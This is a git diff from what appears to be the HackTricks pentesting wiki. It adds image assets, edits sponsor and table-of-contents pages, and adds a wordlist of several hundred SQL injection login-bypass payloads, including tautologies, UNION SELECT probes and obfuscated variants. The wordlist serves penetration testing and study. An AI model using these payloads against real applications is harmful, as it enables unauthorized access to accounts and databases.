(1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) 
(1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) 
(1) (2) (1) (2).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png differ diff --git a/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt new file mode 100644 index 000000000..5a03da57f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or 
"1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1β€²) and '1β€²='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1β€²='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1β€² +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1β€²='1– +) or ('1β€²='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and 
substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* 
+"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# 
+'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 
+")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 
+')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 30e9c3cba..b0e4b2d7e 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -22,7 +22,7 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>) InfluxDB diff --git a/README.md b/README.md index 3f43b7b96..7d59ec5ea 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ Here you will find the **typical flow** that **you should follow when pentesting ### [STM Cyber](https://www.stmcyber.com) -![](<.gitbook/assets/image (642) (1) (1) (1).png>) +![](<.gitbook/assets/image (638) (2) (1).png>) [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training. @@ -72,7 +72,7 @@ Get Access Today:
-[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. +[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more. @@ -84,7 +84,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.** ### [**INE**](https://ine.com) -![](.gitbook/assets/ine\_logo-3-.jpg) +![](<.gitbook/assets/INE\_Logo (3).jpg>) [**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). 
**INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.** diff --git a/SUMMARY.md b/SUMMARY.md index 875c43230..0ed9800a6 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -548,54 +548,9 @@ ## β›ˆ Cloud Security -* [GCP Security](cloud-security/gcp-security/README.md) - * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md) - * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md) - * [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md) - * [GCP - Privesc to Resources](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md) - * [GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation](cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md) - * [GCP - Compute Enumeration](cloud-security/gcp-security/gcp-compute-enumeration.md) - * [GCP - Network Enumeration](cloud-security/gcp-security/gcp-network-enumeration.md) - * [GCP - KMS & Secrets Management Enumeration](cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md) - * [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md) - * [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md) - * [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md) - * [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md) - * [GCP - Persistance](cloud-security/gcp-security/gcp-persistance.md) -* [Workspace Security](cloud-security/workspace-security.md) -* [Github Security](cloud-security/github-security/README.md) - * [Basic Github Information](cloud-security/github-security/basic-github-information.md) -* [Gitea 
Security](cloud-security/gitea-security/README.md) - * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md) -* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md) - * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) - * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) - * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) - * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md) - * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md) - * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) - * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md) - * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) - * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md) - * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) - * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) - * [Kubernetes Network 
Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) -* [Concourse](cloud-security/concourse/README.md) - * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md) - * [Concourse Lab Creation](cloud-security/concourse/concourse-lab-creation.md) - * [Concourse Enumeration & Attacks](cloud-security/concourse/concourse-enumeration-and-attacks.md) -* [CircleCI](cloud-security/circleci.md) -* [Jenkins](cloud-security/jenkins.md) -* [Apache Airflow](cloud-security/apache-airflow/README.md) - * [Airflow Configuration](cloud-security/apache-airflow/airflow-configuration.md) - * [Airflow RBAC](cloud-security/apache-airflow/airflow-rbac.md) -* [Atlantis](cloud-security/atlantis.md) -* [Cloud Security Review](cloud-security/cloud-security-review.md) -* [AWS Security](cloud-security/aws-security.md) +* [Pentesting Kubernetes](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security) +* [Pentesting Cloud (AWS, GCP, Az...)](https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology) +* [Pentesting CI/CD (Github, Jenkins, Terraform...)](https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology) ## 😎 Hardware/Physical Access diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md deleted file mode 100644 index a8e93193d..000000000 --- a/cloud-security/apache-airflow/README.md +++ /dev/null @@ -1,175 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your 